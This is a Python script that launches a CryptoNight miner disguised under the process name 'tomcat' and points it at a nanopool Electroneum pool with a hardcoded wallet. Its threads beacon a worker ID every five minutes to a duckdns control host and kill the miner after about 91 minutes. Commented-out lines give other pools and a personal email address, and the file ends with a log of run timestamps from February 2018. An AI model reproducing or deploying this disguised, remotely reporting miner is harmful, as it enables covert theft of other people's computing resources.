import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:43:03.296122
#2018-02-17 16:31:01.855068
#2018-02-17 18:18:01.322991
#2018-02-17 20:04:05.378662
#2018-02-17 21:52:05.062617
#2018-02-17 23:37:03.734931
#2018-02-18 01:26:06.002453
#2018-02-18 03:13:07.613481
#2018-02-18 05:03:04.166422
#2018-02-18 06:54:03.691892
#2018-02-18 08:42:02.069002
#2018-02-18 10:28:07.265054
#2018-02-18 12:14:07.026761
#2018-02-18 14:01:05.690241
#2018-02-18 15:51:04.740357
#2018-02-18 17:41:05.926277
#2018-02-18 19:29:05.973219
#2018-02-18 21:14:06.896582
#2018-02-18 23:02:01.551021
#2018-02-19 00:48:07.773621
#2018-02-19 02:35:08.028860
#2018-02-19 04:21:05.456697
#2018-02-19 06:06:07.772479
#2018-02-19 07:55:08.644071
#2018-02-19 09:46:06.247340
#2018-02-19 11:36:07.740190
#2018-02-19 13:23:07.478041
#2018-02-19 15:11:01.453204
#2018-02-19 16:58:06.612635
#2018-02-19 18:44:07.510384
#2018-02-19 20:32:07.423025
#2018-02-19 22:20:02.800812
#2018-02-20 00:05:01.618487
#2018-02-20 01:51:07.792917
#2018-02-20 03:41:05.186608
#2018-02-20 05:26:04.200623
#2018-02-20 07:10:06.818273
#2018-02-20 08:55:08.065341
#2018-02-20 10:38:08.501550
#2018-02-20 12:24:01.710673
#2018-02-20 14:11:07.450684
#2018-02-20 15:55:06.543280
#2018-02-20 17:40:11.277679
#2018-02-20 19:28:06.620639
#2018-02-20 21:16:06.555111
#2018-02-20 23:00:08.870877
#2018-02-21 00:45:10.044090
#2018-02-21 02:30:05.256560
#2018-02-21 04:17:04.435961
#2018-02-21 06:04:02.198392
#2018-02-21 07:51:08.422397
#2018-02-21 09:37:07.030005
#2018-02-21 11:27:02.111058
#2018-02-21 13:15:07.054641
#2018-02-21 15:01:04.205107
#2018-02-21 16:49:01.917066
#2018-02-21 18:38:07.905622
#2018-02-21 20:23:06.266251
#2018-02-21 22:13:01.575253
#2018-02-22 00:02:08.296967
#2018-02-22 01:50:02.018317
#2018-02-22 03:36:07.720511
#2018-02-22 05:23:04.474415
#2018-02-22 07:07:06.289729
#2018-02-22 08:53:07.999142
#2018-02-22 10:41:06.598439
#2018-02-22 12:27:07.362974
#2018-02-22 14:12:02.232603
#2018-02-22 15:58:10.334270
#2018-02-22 17:46:08.627067
#2018-02-22 19:33:05.375961
#2018-02-22 21:25:03.239676
#2018-02-22 23:11:04.756939
#2018-02-23 00:57:05.765243
#2018-02-23 02:44:04.662772
#2018-02-23 04:32:04.705349
#2018-02-23 06:18:02.018692
#2018-02-23 08:04:06.994819
#2018-02-23 10:19:01.746357
#2018-02-23 12:11:09.448483
#2018-02-23 13:58:06.198205
#2018-02-23 15:49:17.503331
#2018-02-23 17:35:04.809274
#2018-02-23 19:22:08.143198
#2018-02-23 21:05:09.192018
#2018-02-23 22:49:05.515014
#2018-02-24 00:40:01.496269
#2018-02-24 02:31:07.709791
#2018-02-24 04:24:03.945575
#2018-02-24 06:10:04.630368
#2018-02-24 07:57:04.335728
#2018-02-24 09:42:07.424271
#2018-02-24 11:37:07.437752
#2018-02-24 13:28:01.973341
#2018-02-24 15:17:01.926421
#2018-02-24 17:06:06.628881
#2018-02-24 18:57:06.312613
#2018-02-24 20:44:01.351545
#2018-02-24 22:58:04.946260
#2018-02-25 02:15:09.071379
#2018-02-25 05:41:06.444241
#2018-02-25 11:36:02.203768